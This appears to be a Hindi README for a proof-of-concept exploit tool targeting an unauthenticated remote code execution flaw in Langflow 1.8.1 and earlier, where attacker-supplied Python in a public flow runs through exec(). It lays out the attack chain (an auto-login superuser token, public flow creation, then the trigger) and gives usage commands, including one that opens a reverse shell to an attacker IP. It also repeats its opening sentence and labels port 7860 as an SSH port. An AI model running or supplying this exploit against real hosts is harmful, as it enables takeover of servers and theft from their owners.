
Langflow 1.8.1 और उससे पहले के संस्करणों में मौजूद यह भेद्यता एक दूरस्थ, अनधिकृत हमलावर को होस्ट पर मनमाना कमांड निष्पादन प्राप्त करने की अनुमति देती है।
Langflow 1.8.1 और उससे पहले के संस्करणों में यह भेद्यता एक दूरस्थ, बिना प्रमाणीकरण वाले हमलावर को होस्ट पर मनमाना कमांड निष्पादन प्राप्त करने की अनुमति देती है।
POST /api/v1/build_public_tmp/{flow_id}/flow एंडपॉइंट किसी को भी बिना प्रमाणीकरण के सार्वजनिक फ्लो बनाने की अनुमति देता है।
वैकल्पिक डेटा पैरामीटर प्रदान करके, एक हमलावर संग्रहीत फ्लो को अपनी स्वयं की निर्मित परिभाषा से ओवरराइड कर सकता है, नोड कॉन्फ़िगरेशन के भीतर मनमाना Python कोड एम्बेड कर सकता है। यह उपयोगकर्ता-नियंत्रित कोड बिना किसी सैंडबॉक्सिंग या सत्यापन के exec() के माध्यम से निष्पादित किया जाता है, जिससे बिना प्रमाणीकरण के रिमोट कोड निष्पादन होता है।
Langflow 1.8.1 और उससे पहले के संस्करण
AUTO_LOGIN=true है तो एक सार्वजनिक फ्लो बनानाजब AUTO_LOGIN=true (डिफ़ॉल्ट कॉन्फ़िगरेशन) होता है, तो एक बिना प्रमाणीकरण वाला हमलावर सभी शर्तों को पूरा कर सकता है:
GET /api/v1/auto_login → एक सुपरयूज़र टोकन प्राप्त करेंPOST /api/v1/flows/ → एक सार्वजनिक फ्लो बनाएंbuild_public_tmp के माध्यम से एक्सप्लॉइट ट्रिगर करेंpython cve-2026-33017.py <host> [options]
विकल्प:
-p PORT, --port PORT: SSH पोर्ट (डिफ़ॉल्ट: 7860)
-id FLOW_ID, --flow_id FLOW_ID: सार्वजनिक फ्लो ID (छोड़े जाने पर एक नया बनाया जाएगा)
-c COMMAND, --command COMMAND: निष्पादित करने के लिए कस्टम कमांड
--shell: एक रिवर्स शेल प्रारंभ करें
--lhost LHOST: रिवर्स शेल के लिए हमलावर का IP
--lport LPORT: रिवर्स शेल के लिए हमलावर का पोर्ट (डिफ़ॉल्ट: 4444)
-t TIMEOUT, --timeout TIMEOUT: कनेक्शन टाइमआउट सेकंड में (डिफ़ॉल्ट: 5)
python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'
python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए है। इसे अपने जोखिम पर उपयोग करें। लेखक किसी भी दुरुपयोग या हुई क्षति के लिए ज़िम्मेदार नहीं है।